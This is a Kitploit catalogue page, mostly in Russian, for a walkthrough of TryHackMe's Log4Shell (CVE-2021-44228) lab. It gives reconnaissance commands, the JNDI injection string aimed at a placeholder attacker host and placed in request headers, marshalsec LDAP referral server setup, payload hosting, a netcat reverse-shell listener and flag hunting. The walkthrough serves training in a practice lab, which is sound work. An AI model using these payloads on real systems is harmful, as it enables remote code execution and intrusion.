Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
solar-exploiting-log4j — This repository provides a detailed walkthrough of the *Solar Exploiting Log4j room* on TryHackMe, focusing on exploiting the critical Log4Shell vulnerability (CVE-2021-44228). The project demonstrates how attackers can leverage insecure logging mechanisms in Java applications to achieve remote code execution. | Kitploit
Инструменты/GitHubGitHub/lavanya2085/solar-exploiting-log4j
Vulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingLearning & EducationLabs & Practice
GitHublavanya2085/solar-exploiting-log4j

solar-exploiting-log4j

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Репозиторий
5 месяцев назадЕщё не проверено

This repository provides a detailed walkthrough of the *Solar Exploiting Log4j room* on TryHackMe, focusing on exploiting the critical Log4Shell vulnerability (CVE-2021-44228). The project demonstrates how attackers can leverage insecure logging mechanisms in Java applications to achieve remote code execution.

Поделиться

🔥 Solar Exploiting Log4j - Пошаговое руководство TryHackMe

📌 Комната: Solar Exploiting Log4j

Платформа: TryHackMe Сложность: Средняя Тема: Log4Shell (уязвимость Log4j)


🧠 Цель

Эксплуатировать уязвимость Log4j (CVE-2021-44228) для получения удаленного выполнения кода и захвата флагов.


🛠️ Используемые инструменты

  • Nmap
  • Burp Suite
  • cURL
  • Netcat
  • Python HTTP Server

🌐 Шаг 1: Разведка

🔍 Сканирование цели

root@kitploit:~
nmap -sC -sV <TARGET_IP>

📌 Результаты

  • Открытые порты: 80 (HTTP), другие в зависимости от комнаты
  • Веб-приложение с бэкендом на Java

🌐 Шаг 2: Перебор веб-приложения

  • Посетить веб-приложение в браузере
  • Взаимодействовать с полями ввода (логин/поиск/заголовки)
  • Перехватить запрос с помощью Burp Suite

💥 Шаг 3: Обнаружение уязвимости Log4j

Уязвимость Log4j позволяет внедрение JNDI:

root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/a}

Если ввод логируется → уязвимость присутствует.


⚙️ Шаг 4: Настройка слушателя

Запуск Netcat

root@kitploit:~
nc -lvnp 4444

Запуск вредоносного LDAP-сервера (пример)

root@kitploit:~
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package

Запуск LDAP-сервера:

root@kitploit:~
java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<ATTACKER_IP>:8000/#Exploit" 1389

📡 Шаг 5: Размещение полезной нагрузки

root@kitploit:~
python3 -m http.server 8000

Создать вредоносный Java-класс (Exploit.class)


🚀 Шаг 6: Запуск эксплойта

Внедрить полезную нагрузку в уязвимое поле:

root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/Exploit}

💡 Используйте заголовки, например:

  • User-Agent
  • X-Api-Version

🖥️ Шаг 7: Получение обратной оболочки

После срабатывания:

  • Цель подключается обратно к слушателю Netcat
  • Вы получаете доступ к оболочке

🔐 Шаг 8: Повышение привилегий (если требуется)

Проверить:

root@kitploit:~
sudo -l

Искать:

  • Неправильно настроенные SUID-бинарники
  • Записываемые файлы
  • Задания cron

🚩 Шаг 9: Захват флагов

root@kitploit:~
find / -name flag.txt 2>/dev/null
cat flag.txt

🧾 Ключевые изученные концепции

  • Log4Shell (CVE-2021-44228)
  • Внедрение JNDI
  • Удаленное выполнение кода (RCE)
  • Обратная оболочка
  • Эксплуатация веб-приложений

Скачать инструмент